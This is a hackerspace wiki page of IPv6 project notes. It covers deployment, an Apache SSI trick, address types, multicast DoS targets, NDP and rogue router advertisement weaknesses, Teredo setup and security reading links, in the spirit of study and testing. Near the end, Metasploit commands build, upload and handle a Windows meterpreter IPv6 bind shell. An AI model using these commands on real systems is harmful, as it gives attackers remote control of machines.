IPv6

• IPv6 deployment
• education
• security research related to IPv6

The project is currently in the planning stage.

• [DONE] our website http://brmlab.cz is accessible on IPv6

• [DONE] we participate in World IPv6 day

Check your web server support SSI

/etc/apache2/sites-enabled/000-default

SetEnvIf Server_Addr "^2001:" IPV6

wget -4 http://www.cznog.eu/images/checkicon.php -O ./images/ipv4.png
wget -6 http://www.cznog.eu/images/checkicon.php -O ./images/ipv6.png

index.html

<!--#if expr="$IPV6"--><img src="/images/ipv6.png" alt="IPv6 smile" />
  <!--#else -->        <img src="/images/ipv4.png" alt="IPv4 sad" />
<!--#endif -->

• What ever happened to IPv5? 2
• quick intro
• IPv6 on Ubuntu and KUbuntu
• IPv6-ready test/debug programs
• Testing Teredo (labs.ripe.net)

• The address notation for IPv6 is a group of 16 2-digit hexadecimal numbers, separated with a ':', global addresses are allocated by IANA (Ip Address Not Available)
• ”::” stands for a string of 0 bits.
• Special addresses are ::1 for loopback
• ::FFFF:<IPv4 address> for IPv4-mapped-on-IPv6
• fe00::0/8 ip6-localnet
• ff00::0 ip6-mcastprefix
• fe80::/10 individuální lokální linkové

• broadcast → multicast

Finding IPv6 hosts

• DNS (highly dependent), server logs
• MAC address allocations (EUI-64 standard)

• DoS targets 1
  • 3 site-local multicast addresses
    • FF05::2 all-routers
    • FF05::FB mDNSv6
    • FF05::1:3 all DHCP servers
  • Several link-local multicast addresses
    • FF02::1 all nodes
    • FF02::2 all routers
    • FF02::F all UPnP
    • … (RFCs )
  • Some deprecated (RFC 3879) site-local addresses but still used
    • FEC0:0:0:FFFF::1 DNS server

http://www.abclinuxu.cz/clanky/architektura-ipv6-adresace-uzlu-1

• Formát_datagramu

• unlimited size of header chain DoS aka Routing header DoS vs RFC 5095

• temporary address for host client application (eg. www browser)
• random 64bit ID
• can be disabled by Group POlicy Object (win) or DHCP

• IPsec not required by IPv6
• blinds IPS, firewalls, ACLs
• network security relies more on endpoint security!
• DoS, malformed packets, spoofed and unprotected IKE messages (ICSA Labs methology)

• more relied upon
• moar types

• NDP replaces ARP
  • not authenticated
  • static entries overwritten by dynamic ones
• SEND (SEcure Neighbor Discovery)

• http://natisbad.org/MIPv6/ [TODO]
• IPSEC VPN over IPv6 called Microsoft Direct Access (Win 2008 server, Win8)

• stateles (SLAAC)
  • rogue Router Advertisement (DoS, MiTM)
  • fe80:: (local link) + MAC (EUI-64)
• statefull DHCPv6, RFC 3315

• http://www.getipv6.info/index.php/Customer_problems_that_could_occur

• ipv6 default policy allowed, not inspected
• imany icmp6 types needs to be allowed too
• how to build and maintain antispam reputation databases?
• fragmentation and reassembly is done only by the end system

• running teredo/miredo you are using public IP address
• IPv6_brokenness_and_DNS_whitelisting

• Penetration Testing with IPv6, 10/2008, hdm
• you dont want that miredo service start everytime (update-rc.d -f miredo remove).
• Faking IP address

int ipv6 install
netsh int ipv6 set teredo [enterpriseclient|client] #(enterpriseclient gives you and public ip)
netsh int ipv6 show teredo # we need qualified State

msfpayload windows/meterpreter/bind_ipv6_tcp LPORT=1337 X > bind.exe
upload bind.exe
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp

http://vimeo.com/15243189

• Comparison_of_IPv6_support_in_routers
• NIST tested products reports (ICSA labs)

• Attacking the IPv6 Protocol Suite, van Hauser, THC
• IPv6 security vendor Point of View, Vyncke, Cisco
• 39. Europen.cz, sbornik
• Cisco-Press-IPv6-Security-2009.pdf (@data)
• Cisco.Press.IPv6.for.Enterprise.Networks.Mar.2011.pdf (@data)
• Implementace_IPv6-CZNIC_academy.pdf (@data), CZ NIC akademie
• 
  Pavel Satrapa, 2011

• IPv6 wiki
• HowTo make IPv6 prefered for teredo/miredo (related to RFC3484)
• Čím si vyzkoušet IPv6? (root.cz)
• IPv6_Specific_Content_in_Apache
• telnet -6 towel.blinkenlights.nl (extra scenes)

• IPv6 test
• THC-IPv6 attack tool
• back{trace,ping} yourself
• http://ipv6-speedtest.net/